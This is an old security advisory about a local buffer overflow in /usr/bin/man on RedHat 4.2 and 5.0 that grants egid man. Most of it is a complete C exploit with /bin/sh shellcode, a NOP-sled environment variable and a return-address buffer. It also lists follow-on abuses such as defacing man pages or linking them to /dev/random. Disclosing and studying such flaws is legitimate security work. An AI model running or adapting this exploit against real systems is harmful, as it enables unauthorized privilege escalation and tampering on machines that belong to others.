COMMAND
man
SYSTEMS AFFECTED
RedHat 4.2, 5.0 (others?)
PROBLEM
Neil Trobaugh posted following. Obviously this vulnerability is
not excessively serious. However, this may lead to some not so
good admin... After all, DoS is DoS.
Local unprivledged users can overflow a buffer in /usr/bin/man
and receive egid man. Malicious users could then change the
content of man pages or replace with ascii porn, ansi bombs, the
+++ath dos, or even use the catman directory to stash warez. DoS
attacks such as linking man pages to /dev/random, urandom, or
zero. Exploit follows:
/*
*
* Discovered and exploited by /\/ecr0mancer of [S.T.S.I]
* Code ripped from Smashing the Stack...Thanks to Aleph1
*
* Worked with offsets between 400-800 on my 4.2 (2.0.30) system.
*/
#include <stdlib.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=600, bsize=4500;
int i, eggsize=2048;
if (argc > 1) offset = atoi(argv[1]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = 0x90;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/usr/bin/man $RET");
}
SOLUTION
I think RedHat 5.x fixed this while you will have to patch 4.2 on
your own. On 5.1 this doesn't work.